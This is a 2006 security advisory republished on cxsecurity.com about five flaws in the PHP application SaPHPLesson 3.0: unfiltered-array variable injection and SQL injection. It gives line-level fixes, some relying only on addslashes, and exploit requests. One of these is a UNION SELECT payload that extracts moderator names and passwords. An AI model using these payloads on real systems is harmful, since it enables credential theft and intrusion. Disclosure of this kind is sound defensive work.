Bug: SaPHPLesson 3.0 Multbugs ( Ascii Version )

Search:
WLB2

SaPHPLesson 3.0 Multbugs

Published
Credit
Risk
2006.05.10
o y 6 hotmail com
Medium
CWE
CVE
Local
Remote
N/A
CVE-2006-2279
CVE-2006-2278
No
Yes

SaPHPLesson 3.0 Multbugs By :-- D3vil-0x1 | Devil-00 --:

1- Unfilter array

Filename :- show.php

Line :- 102

[code]

$hrow[] = $Row2;[/code]

Fix :-

Add To Line [ 11 ] /show.php This Code :-

we add the code to global to fix all unfilter ver. at the code :)

[code]

$hrow = array();[/code]

Exploit :-

GET ^

/lessons/show.php?lessid=1&hrow=D3vil-0x1

/---------------------------------------------------------/

2- Unfilter array

Filename :- showcat.php

Line :- 80

[code]

$Lsnrow[] = $Row;[/code]

Fix :-

Add To Line [ 11 ] /showcat.php This Code :-

we add the code to global to fix all unfilter ver. at the code :)

[code]

$Lsnrow = array();[/code]

Exploit :-

GET ^

/lessons/showcat.php?forumid=1&Lsnrow=D3vil-0x1

/---------------------------------------------------------/

3- SQL Injection

Filename :- search.php

Line :- MultLines

Fix :-

Line 28 Replace It With

[code]

$Sql = "select * from less,forums where less.Hidden!=1 and BINARY less.".addslashes($Find)."
REGEXP'$Word' and forums.id=less.forumno order by ".addslashes($Order)."
".addslashes($Trteb)."";[/code]

Line 32 Replace It With

[code]

$Sql = "select * from less,forums where less.Hidden!=1 and BINARY less.$Find REGEXP'%$Word%' and
less.forumno='".addslashes($Cat)."' and forums.id=less.forumno order by ".addslashes($Order)."
".addslashes($Trteb)."";[/code]

Exploit :-

POST ^

Word=a&Find=lesstitle UNION ALL SELECT null,null,null,ModName,null,null,null,null,ModPassword,null,null,null,nu
ll,null,null,null,null,null,null,null FROM modretor/*&Cat=All&Order=lessid&Trteb=DESC

/---------------------------------------------------------/

4- SQL Injection

Filename :- misc.php

Line :- 64

Fix :-

Replace Line 62 & 63 With This Code

[code]

$LID = intval($_GET["LID"]);

$Rate = intval($_POST["Rate"]);[/code]

/---------------------------------------------------------/

5- Unfilter array

Filename :- index.php

Line :- 24

[code]

$rows[] = $Row;[/code]

Fix :-

Add To Line [ 11 ] /index.php This Code :-

we add the code to global to fix all unfilter ver. at the code :)

[code]

$rows = array();

$hrow = array();[/code]

Exploit :-

GET ^

/saphplesson/index.php?rows=D3vil-x01

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version